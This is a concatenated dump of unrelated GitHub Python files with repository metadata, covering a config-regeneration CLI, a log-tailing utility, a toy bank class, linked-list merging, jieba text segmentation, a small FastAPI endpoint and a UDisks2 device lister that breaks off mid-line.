temp[match.end():(bi - 2)] + \"\\n\" + fe +\"\\n}\"\n temp = temp[bi:]\n match = re.search(PAT, temp)\n nf = nf + temp\n\n with open(filePath + \"_debug\", 'w') as f:\n f.write(nf)\n\n # with open(filePath+\"_debug\", 'w') as f:\n # for item in debugList:\n # f.write(\"%s\\n\" % item)\n\n\nprocessDir(\"./\")\n","repo_name":"likhilkt/py_scrap","sub_path":"trace_gen_v2.py","file_name":"trace_gen_v2.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16940044106","text":"import argparse\n\nimport sys\nfrom bakerman.handler import discoverRepoHandler\nfrom bakerman.handler import discoverRenderHandler\nfrom bakerman.handler import discoverManifestHandler\nfrom bakerman.handler import discoverLookupHandler\nfrom bakerman.helper import lookupVariables\nfrom bakerman.helper import getLogger\n\nCOMMIT_MESSAGE = \"\"\"\nBakerman committed following changes:\n%s\n\"\"\"\n\n\ndef parseArguments() -> argparse.Namespace:\n \"\"\"\n Defines and parses the CLI provided arguments.\n\n Returns:\n - NameSpace object containing all arguments\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Automatically regenerate config files to include the latest artifact versions.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--repo\",\n type=str,\n dest=\"repo\",\n default=None,\n help=\"The URL of the repository to update. If omitted --workdir is expected to already contain a repo.\",\n )\n parser.add_argument(\n \"--manifest\",\n type=str,\n dest=\"manifest\",\n default=\"bakerman.manifest\",\n help=\"The Bakerman manifest containing the package and container versions.\",\n )\n parser.add_argument(\n \"--template\",\n type=str,\n dest=\"template\",\n default=\"bakerman.template\",\n help=\"The template to render.\",\n )\n parser.add_argument(\n \"--workdir\",\n type=str,\n dest=\"workdir\",\n required=True,\n help=\"The local workdir containing the repository\",\n )\n parser.add_argument(\n \"--target\",\n type=str,\n dest=\"target\",\n default=\"bakerman.target\",\n help=\"The path of the target build file which --template will render into.\",\n )\n parser.add_argument(\n \"--no-repo\",\n dest=\"no_repo\",\n default=False,\n action=\"store_true\",\n help=\"If defined, no repo commit & push is done.\",\n )\n\n return parser.parse_args()\n\n\ndef start(args: argparse.Namespace) -> None:\n \"\"\"\n Main Bakerman logic.\n Performs\n\n Raises:\n Exception: An unhandled error happened and should be made clear to the\n user as this indicates a bug for which a report should be made.\n \"\"\"\n\n logger = getLogger(\"main\")\n commit_message = []\n try:\n\n # Get the repository handler which is responsible for doing all the\n # CVS interaction in which the container build and Bakerman files are\n # stored.\n repo_cls = discoverRepoHandler(workdir=args.workdir, uri=args.repo)\n repo = repo_cls(uri=args.repo, workdir=args.workdir)\n\n # Get the render handler which is responsible for rendering the\n # `--template` file using the arguments the manifest handler comes up\n # with\n render_cls = discoverRenderHandler(args.workdir, args.template)\n target_file = render_cls(args.workdir, args.template, args.target)\n\n # Get the manifest handler which is responsible for reading and\n # writing the manifest file and returning a Python data structure.\n manifest_cls = discoverManifestHandler(args.workdir, args.manifest)\n manifest = manifest_cls(args.workdir, args.manifest)\n manifest_content = manifest.read()\n\n # Get all the different lookup handlers needed to discover the latest\n # values requested in the manifest file. lookupVariables() is just a\n # convenience function which takes care of this.\n variables = lookupVariables(discoverLookupHandler, manifest_content)\n\n # Update the content of the manifest for each variable we have found.\n # And write it\n for key, value in variables.items():\n if manifest.updateVariable(key, value):\n message = f\"Variable '{key}' has been updated to '{value}'.\"\n commit_message.append(\"- \" + message)\n logger.info(message)\n else:\n logger.debug(f\"Variable '{key}' has not changed.\")\n\n # Write the manifest to disk\n manifest_updated = manifest.write()\n\n # Render the template file using the new found version numbers.\n if manifest_updated:\n logger.info(\n f\"The manifest has been updated. Regenerating target file '{args.workdir}/{args.target}'\"\n )\n target_file.render(variables)\n\n if args.no_repo:\n logger.info(f\"--no-repo set, not committing nor pushing any changes.\")\n else:\n logger.info(f\"Committing changes and pushing repo.\")\n repo.commit(COMMIT_MESSAGE % \"\\n\".join(commit_message))\n repo.push()\n else:\n logger.info(\n f\"The manifest has not been updated. Not regenerating target file '{args.workdir}/{args.target}'\"\n )\n\n except NotImplementedError as err:\n logger.error(\"Fatal Error. Reason: %s\" % (err))\n sys.exit(1)\n\n except Exception as err:\n print(\n \"An unhandled error occurred. Please submit a bug report including the manifest, template and CLI command used. Reason: %s\"\n % (err)\n )\n raise\n\n\ndef main():\n\n arguments = parseArguments()\n start(arguments)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"smetj/bakerman","sub_path":"bakerman/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12432187750","text":"from conta import Conta\nimport random\nfrom datetime import datetime\n\nclass Bank():\n def __init__(self,):\n self.__contas = {}\n self.__agencias = []\n self.today = datetime.today().date()\n\n\n \n @property\n def agencias(self):\n return self.__agencias\n \n @property\n def contas(self,):\n return self.__contas\n \n def is_same_day(self):\n if datetime.today().date() == self.today:\n return True\n else:\n self.today = datetime.today().date()\n return False\n \n def gerar_numero_agencia(self,):\n # Defina o intervalo para os números de agências que você deseja simular\n numero_minimo = 1000\n numero_maximo = 9999\n\n # Gere um número aleatório de agência dentro do intervalo definido\n numero_agencia = random.randint(numero_minimo, numero_maximo)\n if numero_agencia not in self.__agencias:\n self.__agencias.append(numero_agencia)\n return numero_agencia\n\n def criaConta(self, numero:int,agencia:int):\n if f\"{numero}\" not in self.__contas:\n if agencia in self.__agencias:\n self.__contas[f\"{numero}\"]= Conta(numero,agencia)\n print(self.__contas[f\"{numero}\"])\n else:\n print(\"numero de conta já existente\")\n\n def realiza_deposito(self,numeroConta:int,valor:float):\n if numeroConta > 0:\n contaEnvio = self.__contas[f'{numeroConta}']\n contaEnvio.recebe_deposito(valor)\n contaEnvio.adiciona_transacao(f'{self.today}deposito de {valor}; Saldo: {contaEnvio.saldo}')\n return f\"deposito de {valor} para a conta:{numeroConta}; Saldo atual de: {contaEnvio.saldo}\"\n else:\n return \"Valor de depósito inválido\"\n \n\n def verifica_extrato(self,numeroConta:int):\n contaExtrato = self.__contas[f\"{numeroConta}\"]\n return contaExtrato.transacoes\n \n def realiza_saque(self,numeroConta:int,valor:float):\n if f\"{numeroConta}\" in self.__contas:\n contaSacada = self.__contas[f\"{numeroConta}\"]\n if valor <= 500 and valor <= contaSacada.saldo and contaSacada.saqueHoje <3:\n if self.is_same_day_day():\n contaSacada.saqueHoje +=1\n else:\n contaSacada.saqueHoje = 0\n contaSacada.realiza_saque(valor)\n contaSacada.adiciona_transacao(f'{self.today} Saque realizado de {valor}; Saldo: {contaSacada.saldo}')\n return f'Saque realizado de {valor}; Saldo: {contaSacada.saldo}' \n else:\n print(\"valor de saque inválido\")\n else:\n print(f\"{numeroConta} inexistente.\")","repo_name":"danmtsu/Ifood-data-science","sub_path":"JPDBank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11881340230","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Print an unseen tailing part of a log file\"\"\"\n\n\nimport argparse\nimport logging\nimport os\nimport shutil\nimport sys\nimport tempfile\n\nVERSION = (0, 9, 2)\n__version__ = '.'.join(map(str, VERSION))\nDEFAULT_POSITION = (0, b'')\nLOG_FORMAT = '%(levelname)s: %(message)s'\nCACHE_DELIMITER = '##'\nEOL = b'\\n'\nCACHE_FILENAME = '.cutthelog'\nHELPS = {\n 'logfile': 'path of a file to print',\n 'cache_file': 'path of the cache file',\n 'cache_delimiter': 'delimiter of cache record (by default \"{}\")'.format(CACHE_DELIMITER),\n 'verbose': 'enable verbose mode',\n 'version': 'print utility version and exit',\n}\nNOT_FOUND = 'File \"%s\" not found'\nNO_PERMISSION = 'No permission to %s \"%s\"'\n\n\nclass CutthelogError(Exception):\n \"\"\"General module exception\"\"\"\n\n\nclass CutthelogCacheError(CutthelogError):\n \"\"\"Error of cache interaction\"\"\"\n\n\nclass CutTheLog:\n \"\"\"A class to read a single file from cache postition\"\"\"\n\n def __init__(self, path, offset=None, last_line=None):\n \"\"\"An object initilization\n\n Parameters\n ----------\n path : |str|\n An absolute or relative path of a file to read\n offset : |int|, optional\n The file position of the last line read on the last interaction\n last_line : |bytes|, optional\n The value of the last line read on the last interaction\n \"\"\"\n self.path = os.path.normpath(os.path.abspath(path))\n self.offset = None\n self.last_line = None\n self.fhandler = None\n self.set_position(offset, last_line)\n\n def get_position(self):\n \"\"\"Return position stored in the object\"\"\"\n return (self.offset, self.last_line)\n\n def set_position(self, offset=None, last_line=None):\n \"\"\"Set internal object position or reset it without arguments\"\"\"\n self.offset = offset or DEFAULT_POSITION[0]\n self.last_line = last_line or DEFAULT_POSITION[1]\n\n def __call__(self, offset=None, last_line=None):\n \"\"\"Allow to set position inside with statement like\n\n Parameters\n ----------\n offset : |int|, optional\n The file position of the last line read on the last interaction\n last_line : |bytes|, optional\n The value of the last line read on the last interaction\n\n Examples\n --------\n >>> cutthelog = CutTheLog('/var/log/kern.log')\n >>> with cutthelog(offset=2605148, last_line=b'Feb 20 11:22:57 ...') as line_iter:\n ... for line in line_iter:\n ... print(line.encode(), end='')\n \"\"\"\n self.set_position(offset, last_line)\n return self\n\n def __enter__(self):\n \"\"\"Open the file and check whether the position is correct\n\n If check fails and the position resets to the start of the file.\n Return iterator over unseen byte lines\"\"\"\n fhandler = open(self.path, 'rb')\n offset, last_line = self.get_position()\n try:\n fhandler.seek(offset)\n line = next(fhandler)\n if line.rstrip(EOL) != last_line.rstrip(EOL):\n raise StopIteration\n except (IOError, StopIteration):\n fhandler.seek(0)\n self.set_position()\n self.fhandler = fhandler\n return iter(self)\n\n def is_file_opened(self):\n return self.fhandler is not None and not self.fhandler.closed\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"Close the file\"\"\"\n if self.is_file_opened():\n self.fhandler.close()\n\n def __iter__(self):\n \"\"\"Iterator over lines of the file\n\n It's intended only for using inside the __enter__ method\n when the file is opened\"\"\"\n if not self.is_file_opened():\n return\n offset_change = len(self.last_line)\n for line in self.fhandler:\n self.offset += offset_change\n self.last_line = line\n yield line\n offset_change = len(line)\n\n def get_eof_position(self):\n \"\"\"Return offset and value of the last line without reading of the whole file\n\n Raises\n ------\n EnvironmentError\n On failed file opening or reading\n \"\"\"\n chunk_size = 512\n last_line_chunks = []\n with open(self.path, 'rb') as fhandler:\n fhandler.seek(0, os.SEEK_END)\n offset = fhandler.tell()\n while offset > 0:\n step = min(chunk_size, offset)\n offset -= step\n fhandler.seek(offset, os.SEEK_SET)\n chunk = fhandler.read(step)\n start, end = (None, None) if last_line_chunks else (0, step - 1)\n last_line_pos = chunk.rfind(EOL, start, end) + 1\n if last_line_pos > 0:\n offset += last_line_pos\n last_line_chunks.append(chunk[last_line_pos:])\n break\n last_line_chunks.append(chunk)\n return (offset, b''.join(reversed(last_line_chunks)))\n\n def _get_cache_props(self, delimiter):\n delimiter = delimiter or CACHE_DELIMITER\n return (self.path.encode() + delimiter.encode(), delimiter.encode())\n\n def set_position_from_cache(self, cache_file, delimiter=None):\n \"\"\"Set the internal position from cache file\n\n If there is no file record in the cache object position doesn't change\n A cache record of a file looks like\n \n\n There is no need to parse every cache line so we search only the required one\n and don't use the csv module\n\n Parameters\n ----------\n cache_file : |str|\n An path of cache file\n delimiter : |str|, optional\n An delimiter using by cache record\n\n Raises\n ------\n `CutthelogCacheError`\n On failed cache reading or malformed cache record for the file\n \"\"\"\n file_prefix, delimiter = self._get_cache_props(delimiter)\n try:\n with open(cache_file, 'rb') as fhandler:\n line_iter = ((index, line) for index, line in enumerate(fhandler)\n if line.startswith(file_prefix))\n index, line = next(line_iter, (None, None))\n if line is not None:\n splitted_line = line.split(delimiter, 2)\n if len(splitted_line) == 3:\n try:\n self.set_position(int(splitted_line[1]), splitted_line[2])\n except ValueError:\n msg = 'Bad offset {} in line #{}'.format(splitted_line[1], index)\n raise CutthelogCacheError(msg)\n else:\n msg = 'Malformed cache line #{}: {}'.format(index, line.rstrip())\n raise CutthelogCacheError(msg)\n except EnvironmentError as err:\n raise CutthelogCacheError('Failed to read cache: ' + str(err))\n\n def save_to_cache(self, cache_file, delimiter=None):\n \"\"\"Save position of the file to cache\n\n At first the file record is written to temporary file, then records of other files are\n appended and finally the temporary file is copyed to the original cache path\n As a result records of the last read file are stored at the start of the cache so they are\n found faster on the next run\n\n Parameters\n ----------\n cache_file : |str|\n An path of cache file\n delimiter : |str|, optional\n An delimiter using by cache record\n\n Raises\n ------\n `CutthelogCacheError`\n On failed cache reading or malformed cache record for the file\n \"\"\"\n file_prefix, delimiter = self._get_cache_props(delimiter)\n offset, last_line = self.get_position()\n try:\n with tempfile.NamedTemporaryFile(mode='wb') as fhandler:\n fhandler.write(self.path.encode())\n fhandler.write(delimiter)\n fhandler.write(str(offset).encode())\n fhandler.write(delimiter)\n fhandler.write(last_line)\n if not last_line.endswith(EOL):\n fhandler.write(EOL)\n try:\n with open(cache_file, 'rb') as source_fhandler:\n for line in source_fhandler:\n if not line.startswith(file_prefix):\n fhandler.write(line)\n except EnvironmentError:\n pass\n fhandler.flush()\n shutil.copyfile(fhandler.name, cache_file)\n except EnvironmentError as err:\n msg = 'Failed to save cache: ' + str(err)\n raise CutthelogCacheError(msg)\n\n\ndef argument_parsing():\n parser = argparse.ArgumentParser(description=__doc__)\n main_group = parser.add_mutually_exclusive_group(required=True)\n main_group.add_argument('logfile', help=HELPS['logfile'], nargs='?')\n main_group.add_argument('-V', '--version', help=HELPS['version'], action='store_true')\n parser.add_argument('-c', '--cache-file', help=HELPS['cache_file'])\n parser.add_argument('--cache-delimiter', help=HELPS['cache_delimiter'],\n default=CACHE_DELIMITER)\n parser.add_argument('-v', '--verbose', help=HELPS['verbose'], action='store_true')\n args = parser.parse_args()\n if args.cache_file is None:\n home = os.getenv('USERPROFILE' if os.name == 'nt' else 'HOME', '/')\n home_cache = os.path.join(home, CACHE_FILENAME)\n args.cache_file = home_cache if os.access(home, os.R_OK | os.W_OK) else CACHE_FILENAME\n return args\n\n\ndef check_logfile(path):\n if not os.path.isfile(path):\n logging.error(NOT_FOUND, path)\n return 66\n if not os.access(path, os.R_OK):\n logging.error(NO_PERMISSION, 'read', path)\n return 77\n return 0\n\n\ndef check_cache_file(path):\n if os.path.isfile(path):\n if not os.access(path, os.R_OK | os.W_OK):\n logging.error(NO_PERMISSION, 'read/write', path)\n return 77\n else:\n cache_dir = os.path.dirname(path)\n if not os.path.isdir(cache_dir):\n logging.error(NOT_FOUND, cache_dir)\n return 74\n if not os.access(cache_dir, os.R_OK | os.W_OK):\n logging.error(NO_PERMISSION, 'read/write', cache_dir)\n return 77\n try:\n with open(path, 'wb'):\n pass\n except EnvironmentError as err:\n logging.error('Failed to create file: %s', err)\n return 74\n return 0\n\n\ndef main():\n \"\"\"The cutthelog command line utility\n\n It uses the basic function `CutTheLog` object. See description in README.rst\n \"\"\"\n args = argument_parsing()\n if args.version:\n print(__version__)\n return 0\n lvl = logging.DEBUG if args.verbose else logging.WARNING\n logging.basicConfig(stream=sys.stderr, level=lvl, format=LOG_FORMAT)\n returncode = check_logfile(args.logfile) or check_cache_file(args.cache_file)\n if returncode:\n return returncode\n cutthelog = CutTheLog(args.logfile)\n try:\n cutthelog.set_position_from_cache(args.cache_file, delimiter=args.cache_delimiter)\n except CutthelogCacheError as err:\n logging.error(err)\n return 74\n initial_position = cutthelog.get_position()\n try:\n with cutthelog as line_iter:\n stdout = sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout\n stdout.writelines(line_iter)\n except EnvironmentError as err:\n logging.error('Failed to read file: %s', err)\n return 74\n if cutthelog.get_position() != initial_position:\n try:\n cutthelog.save_to_cache(args.cache_file, delimiter=args.cache_delimiter)\n except CutthelogCacheError as err:\n logging.error(err)\n return 74\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"yaznahar/cutthelog","sub_path":"cutthelog.py","file_name":"cutthelog.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"34424640521","text":"\r\n#range(...)#流水號\r\nx=[\"apple\",\"banana\",\"orange\",\"cherry\"]\r\ny=[88,90,95]\r\nz=range(1,50)\r\nfor j in x:\r\n if(j==\"cherry\"):\r\n print(y[2])\r\n\r\nx=[66,75,21,35,45,12,15,63,58,74]\r\nno=3\r\nfor j in x:\r\n print(j,no)\r\n no+=2\r\n\r\nsum=0\r\ni=1\r\nwhile i <=3: #1.2.3\r\n sum += i \r\n i +=1\r\nprint(\"sum:\",sum,\"i:\",i)\r\n#print(\"sum:\", sum)\r\n\r\nsum=0\r\nfor i in range(3): \r\n sum += i\r\nprint(\"sum:\",sum, \"i:\", i)\r\n \r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"Anne0407/python-for-while","sub_path":"my04.py","file_name":"my04.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6867096844","text":"class Node:\n\n def __init__(self, value):\n self.data = value\n self.next = None\n\n\ndef insert_at_end(head, value):\n curr = head\n while(curr.next):\n curr = curr.next\n\n curr.next = Node(value)\n\n\ndef merge_lists_recursive(headA, headB):\n newList = None\n\n if(headA is None):\n return headB\n\n if(headB is None):\n return headA\n\n if(headA.data < headB.data):\n newList = headA\n newList.next = merge_lists_recursive(headA.next, headB)\n else:\n newList = headB\n newList.next = merge_lists_recursive(headA, headB.next)\n\n return newList\n\n\ndef merge_lists_iterative(headA, headB):\n newList = Node(0)\n newHead = newList\n\n while(headA or headB):\n if(headA is None):\n newList.next = headB\n break\n\n if(headB is None):\n newList.next = headA\n break\n\n if(headA.data < headB.data):\n newList.next = headA\n headA = headA.next\n else:\n newList.next = headB\n headB = headB.next\n newList = newList.next\n\n return newHead.next\n\n\ndef print_list(message, head):\n if (head is None):\n return\n\n print(message, end=\"\")\n temp = head\n while(temp):\n print (temp.data, \"->\", end=\" \")\n temp = temp.next\n print(\"None\")\n\n\nif __name__ == \"__main__\":\n headA = Node(1)\n insert_at_end(headA, 3)\n insert_at_end(headA, 5)\n insert_at_end(headA, 7)\n insert_at_end(headA, 9)\n\n print_list(\"List1: \", headA)\n\n headB = Node(2)\n insert_at_end(headB, 4)\n insert_at_end(headB, 6)\n insert_at_end(headB, 8)\n\n print_list(\"List2: \", headB)\n\n print_list(\"Iter Merged List: \", merge_lists_iterative(headA, headB))\n # print_list(\"Recr Merged List: \", merge_lists_recursive(headA, headB))\n","repo_name":"mani319/DSA","sub_path":"linked_lists/merge_two_sorted_lists.py","file_name":"merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36177554729","text":"import torch\n\n# Check if a GPU is available; if not, use CPU\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Create tensors on the GPU\na = torch.randn(3, 3).to(device)\nb = torch.randn(3, 3).to(device)\n\n# Perform a simple calculation on the GPU\nresult = a + b\n\n# Move the result back to the CPU if needed (for printing, etc.)\nresult_cpu = result.to(\"cpu\")\n\n# Print the result\nprint(\"Result on GPU:\")\nprint(result)\nprint(\"\\nResult on CPU:\")\nprint(result_cpu)\n","repo_name":"Quitzchell/chatbot-sandbox","sub_path":"gpu_scripts/gpu_amd.py","file_name":"gpu_amd.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10857311106","text":"#! -*- coding:utf-8 -*-\n\nimport jieba\nimport jieba.posseg as psg\nimport jieba.analyse\nimport codecs\nimport json\nfrom tqdm import tqdm\nimport os\n\ntest_path = '../data/coreEntityEmotion_test_stage1.txt'\ndata_path = '../runs/all_train_data.json'\ncut_train_path = '../runs/all_train_cut.json'\ncut_test_path = '../runs/all_test_cut.json'\ntran_dic_path = '../runs/train_dic.json'\ntest_dic_path = '../runs/test_dic.json'\n\n\ndef jieba_config():\n files = os.listdir('../dic')\n for file_name in files:\n jieba.load_userdict('../dic/'+file_name)\n jieba.load_userdict('../runs/entity.txt')\n jieba.analyse.set_stop_words('../data/stop_words.txt')\n\ndef load_train_data(data_path):\n with open(data_path, 'r', encoding='utf-8') as load_f:\n data = json.load(load_f)\n return data\n\ndef stop_words():\n stop_words = []\n with open('../data/stop_words.txt', 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip('\\n')\n stop_words.append(line)\n return stop_words\n\ndef cut_train(data_path):\n final_train_data = []\n # word_flag_dic = {}\n train_data = load_train_data(data_path)\n i = 0\n for x in train_data:\n if len(x.items()) == 4:\n try:\n title = x['title']\n content = x['content']\n\n # title_words = jieba.cut(title)\n # content_words = jieba.cut(content)\n\n # title_filter = [word for word in title_words if word not in stop_words()]\n # content_filter = [word for word in content_words if word not in stop_words()]\n\n title_filter = filter(lambda x: x not in stop_words and len(x.strip()) > 0, psg.cut(title))\n content_filter = filter(lambda x: x not in stop_words and len(x.strip())>0, psg.cut(content))\n\n # word_flag_dic = dict((word,flag) for (word,flag) in [title_filter,content_filter])\n # for word, flag in title_filter:\n # word_flag_dic[word] = flag\n # for word, flag in content_filter:\n # word_flag_dic[word] = flag\n\n # temp = {}\n # temp['newsId'] = x['newsId']\n # temp['title'] = title_filter\n # temp['content'] = content_filter\n # entitys = [c[0] for c in x['coreEntityEmotions']]\n # temp['entities'] = entitys\n # final_train_data.append(temp)\n\n if i % 500 == 0:\n print(i,' data finish')\n i+=1\n except KeyError:\n print(x)\n pass\n # with codecs.open(cut_train_path, 'w', encoding='utf-8') as f:\n # json.dump(final_train_data, f, indent=4, ensure_ascii=False)\n # with codecs.open(tran_dic_path, 'w', encoding='utf-8') as f:\n # json.dump(word_flag_dic, f, indent=4, ensure_ascii=False)\n return final_train_data\n\ndef load_test():\n test_chars = {}\n test_data = []\n min_count = 2\n\n with open(test_path, encoding='utf-8') as f:\n for l in tqdm(f):\n a = json.loads(l.strip())\n test_data.append(\n {\n 'newsId': a['newsId'],\n 'title': a['title'],\n 'content': a['content'],\n }\n )\n for c in a['content']:\n test_chars[c] = test_chars.get(c, 0) + 1\n for c in a['title']:\n test_chars[c] = test_chars.get(c, 0) + 1\n\n with codecs.open('../runs/test_chars.json', 'w', encoding='utf-8') as f:\n chars = {i: j for i, j in test_chars.items() if j >= min_count}\n id2char = {i + 2: j for i, j in enumerate(chars)} # padding: 0, unk: 1\n char2id = {j: i for i, j in id2char.items()}\n json.dump([id2char, char2id], f, indent=4, ensure_ascii=False)\n return test_data\n\ndef cut_test():\n # word_flag_dic = {}\n final_test_data = []\n test_data = load_test()\n i = 0\n for x in test_data:\n if len(x.items()) == 3:\n try:\n title = x['title']\n content = x['content']\n\n title_words = jieba.cut(title)\n content_words = jieba.cut(content)\n\n # title_filter = [word for word in title_words if word not in stop_words()]\n # content_filter = [word for word in content_words if word not in stop_words()]\n\n title_filter = filter(lambda x: x not in stop_words and len(x.strip()) > 0, psg.cut(title))\n content_filter = filter(lambda x: x not in stop_words and len(x.strip()) > 0, psg.cut(content))\n\n # for word, flag in title_filter:\n # word_flag_dic[word] = flag\n # for word, flag in content_filter:\n # word_flag_dic[word] = flag\n\n # temp = {}\n # temp['newsId'] = x['newsId']\n # temp['title'] = title_filter\n # temp['content'] = content_filter\n # final_test_data.append(temp)\n if i%500 == 0:\n print(i,' data finish')\n i+=1\n except KeyError:\n print(x)\n pass\n # with codecs.open(cut_test_path, 'w', encoding='utf-8') as f:\n # json.dump(final_test_data, f, indent=4, ensure_ascii=False)\n # with codecs.open(test_dic_path, 'w', encoding='utf-8') as f:\n # json.dump(final_test_data, f, indent=4, ensure_ascii=False)\n return final_test_data\n\nif __name__ == '__main__':\n cut_train(data_path)\n cut_test()\n","repo_name":"angelOnly/2019_content_recognition","sub_path":"src/cut_data.py","file_name":"cut_data.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31517474220","text":"from fastapi import FastAPI\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/groups\")\r\nasync def groups():\r\n groups_list = [\r\n {\r\n \"id\": 1,\r\n \"online\": False,\r\n \"nombre\": \"Casa\",\r\n \"color\": \"1\",\r\n \"miembros\": [\"Adrian\", \"Brais\", \"Bea\", \"Camilo\"],\r\n },\r\n {\r\n \"id\": 2,\r\n \"online\": True,\r\n \"nombre\": \"Trabajo\",\r\n \"color\": \"3\",\r\n \"miembros\": [\"Mario#1231\", \"Brais#1223\", \"Miguel#4123\"],\r\n },\r\n ]\r\n return groups_list\r\n","repo_name":"braiso-22/CozyCave-back","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9390515902","text":"#! /usr/bin/env python3\n\n# Udisks2 API reference: https://udisks.freedesktop.org/docs/latest/\n# Example code: https://www.apt-browse.org/browse/ubuntu/trusty/main/i386/usb-creator-common/0.2.56/file/usr/share/usb-creator/usb-creator-helper\n\nimport gi\n# Make sure the right UDisks version is loaded\ngi.require_version('UDisks', '2.0')\nfrom gi.repository import UDisks, GLib\nfrom os.path import exists, join, basename\nimport os\nimport time\nfrom utils import getoutput, shell_exec, has_grub\nfrom encryption import get_status, is_encrypted, unmount_partition\n\n\n# Subclass dict class to overwrite the __missing__() method\n# to implement autovivificious dictionaries:\n# https://en.wikipedia.org/wiki/Autovivification#Python\nclass Tree(dict):\n def __missing__(self, key):\n value = self[key] = type(self)()\n return value\n\n\nclass Udisks2():\n def __init__(self):\n super(Udisks2, self).__init__()\n self.no_options = GLib.Variant('a{sv}', {})\n self.no_interaction = GLib.Variant('a{sv}', {'auth.no_user_interaction': GLib.Variant('b', True)})\n self.devices = Tree()\n\n # Create multi-dimensional dictionary with drive/device/deviceinfo\n def fill_devices(self, flash_only=True):\n\n self.devices.clear()\n\n client = UDisks.Client.new_sync(None)\n manager = client.get_object_manager()\n objects = manager.get_objects()\n\n for obj in objects:\n block = None\n partition = None\n fs = None\n drive = None\n device_path = ''\n fs_type = ''\n drive_path = ''\n add_device = False\n removable = False\n connectionbus = ''\n mount_point = ''\n total_size = 0\n free_size = 0\n used_size = 0\n \n block = obj.get_block()\n if block is None:\n continue\n\n device_path = block.get_cached_property('Device').get_bytestring().decode('utf-8')\n fs_type = block.get_cached_property('IdType').get_string()\n if fs_type == '':\n continue\n\n mapper_path = ''\n luks_mount = ''\n if 'luks' in fs_type.lower():\n mapper_path, luks_mount = self.get_luks_info(device_path)\n if mapper_path:\n device_path = mapper_path\n fs_type = self.get_filesystem(device_path)\n else:\n # Block object doesn't refresh correctly after decrypting\n # block.call_rescan_sync doesn't do anything\n # Fix with workaround:\n fs_type = self.get_filesystem(device_path)\n\n drive_path = self.get_drive_from_device_path(device_path)\n\n if device_path != drive_path:\n total_size = (block.get_cached_property('Size').get_uint64() / 1024)\n if (mapper_path and total_size == 0) or \\\n (not mapper_path and not exists(drive_path)) or \\\n (not mapper_path and total_size == 0 and not 'luks' in fs_type.lower()):\n continue\n\n if luks_mount:\n mount_point = luks_mount\n total_size, free_size, used_size = self.get_mount_size(mount_point)\n else:\n fs = obj.get_filesystem()\n if fs is not None:\n unmount = False\n mount_points = fs.get_cached_property('MountPoints').get_bytestring_array()\n if mount_points:\n mount_point = mount_points[0]\n else:\n # It can be manually mounted (with mount command)\n mount_point = self.get_mount_point(device_path)\n if not mount_point:\n # If not mounted, temporally mount it to get needed info\n mount_point = self._mount_filesystem(fs)\n unmount = True\n if exists(mount_point):\n total_size, free_size, used_size = self.get_mount_size(mount_point)\n if unmount:\n self._unmount_filesystem(fs)\n mount_point = ''\n\n # There are no partitions: set free size to total size\n partition = obj.get_partition()\n if partition is None:\n free_size = total_size\n\n drive_name = block.get_cached_property('Drive').get_string()\n drive_obj = manager.get_object(drive_name)\n if drive_obj is None:\n continue\n drive = drive_obj.get_drive()\n removable = drive.get_cached_property(\"Removable\").get_boolean()\n connectionbus = drive.get_cached_property(\"ConnectionBus\").get_string()\n\n if flash_only:\n # Check for usb mounted flash drives\n if connectionbus == 'usb' and removable:\n add_device = True\n else:\n add_device = True\n\n if add_device:\n uuid = self.get_uuid(device_path)\n label = self.get_label(device_path)\n grub = has_grub(device_path)\n debug_title = \"Device Info of: %s\" % device_path\n print(('========== %s ==========' % debug_title))\n print(('UUID: %s' % uuid))\n print(('FS Type: %s' % fs_type))\n print(('Mount point: %s' % mount_point))\n print(('Label: %s' % label))\n print(('Total size: %s' % total_size))\n print(('Free size: %s' % free_size))\n print(('Used size: %s' % used_size))\n print(('ConnectionBus: %s' % connectionbus))\n print(('Removable: %s' % str(removable)))\n print(('Has Grub: %s' % str(grub)))\n print((('=' * 22) + ('=' * len(debug_title))))\n\n # Partition information\n self.devices[device_path]['uuid'] = uuid\n self.devices[device_path]['fs_type'] = fs_type\n self.devices[device_path]['mount_point'] = mount_point\n self.devices[device_path]['label'] = label\n self.devices[device_path]['total_size'] = total_size\n self.devices[device_path]['free_size'] = free_size\n self.devices[device_path]['used_size'] = used_size\n self.devices[device_path]['connectionbus'] = connectionbus\n self.devices[device_path]['removable'] = removable\n self.devices[device_path]['has_grub'] = grub\n\n def _get_object_path(self, device_path):\n return 